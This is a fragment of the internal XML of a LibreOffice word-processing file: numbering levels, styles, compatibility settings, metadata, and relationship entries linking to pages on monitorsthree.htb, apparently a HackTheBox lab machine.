          <w:tab w:val="num" w:pos="2160"/>
        </w:tabs>
        <w:ind w:start="2160" w:hanging="360"/>
      </w:pPr>
      <w:rPr/>
    </w:lvl>
    <w:lvl w:ilvl="5">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%6."/>
      <w:lvlJc w:val="start"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="2520"/>
        </w:tabs>
        <w:ind w:start="2520" w:hanging="360"/>
      </w:pPr>
      <w:rPr/>
    </w:lvl>
    <w:lvl w:ilvl="6">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%7."/>
      <w:lvlJc w:val="start"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="2880"/>
        </w:tabs>
        <w:ind w:start="2880" w:hanging="360"/>
      </w:pPr>
      <w:rPr/>
    </w:lvl>
    <w:lvl w:ilvl="7">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%8."/>
      <w:lvlJc w:val="start"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="3240"/>
        </w:tabs>
        <w:ind w:start="3240" w:hanging="360"/>
      </w:pPr>
      <w:rPr/>
    </w:lvl>
    <w:lvl w:ilvl="8">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%9."/>
      <w:lvlJc w:val="start"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="3600"/>
        </w:tabs>
        <w:ind w:start="3600" w:hanging="360"/>
      </w:pPr>
      <w:rPr/>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="7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75"/>
  <w:defaultTabStop w:val="709"/>
  <w:autoHyphenation w:val="true"/>
  <w:hyphenationZone w:val="0"/>
  <w:compat>
    <w:compatSetting w:name="compatibilityMode" w:uri="http://schemas.microsoft.com/office/word" w:val="15"/>
    <w:compatSetting w:name="useWord2013TrackBottomHyphenation" w:uri="http://schemas.microsoft.com/office/word" w:val="1"/>
    <w:compatSetting w:name="allowHyphenationAtTrackBottom" w:uri="http://schemas.microsoft.com/office/word" w:val="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" w:cs="FreeSans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start"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Liberation Serif" w:hAnsi="Liberation Serif" w:eastAsia="Noto Sans" w:cs="FreeSans"/>
      <w:color w:val="auto"/>
      <w:kern w:val="2"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
      <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="NumberingSymbols">
    <w:name w:val="Numbering Symbols"/>
    <w:qFormat/>
    <w:rPr/>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:rPr>
      <w:color w:val="000080"/>
      <w:u w:val="single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" w:cs="Free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hyperlink" Target="http://monitorsthree.htb/" TargetMode="External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hyperlink" Target="http://monitorsthree.htb/login.php" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://monitorsthree.htb/forgot_password.php" TargetMode="Externa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numbering" Target="numbering.xml"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/fontTable" Target="fontTable.xml"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/settings" Target="settings.xml"/><Relationship Id="rId2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177</TotalTime>
  <Application>LibreOffice/24.8.3.2$Linux_X86_64 LibreOffice_project/480$Build-2</Application>
  <AppVersion>15.0000</AppVersion>
  <Pages>15</Pages>
  <Words>829</Words>
  <Characters>5154</Characters>
  <CharactersWithSpaces>6128</CharactersWithSpaces>
  <Paragraphs>101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2024-12-03T10:02:29Z</dcterms:created>
  <dc:creator/>
  <dc:description/>
  <dc:language>en-US</dc:language>
  <cp:lastModifiedBy/>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-12-06T10:13:22Z</dcterms:modified>
  <cp:revision>15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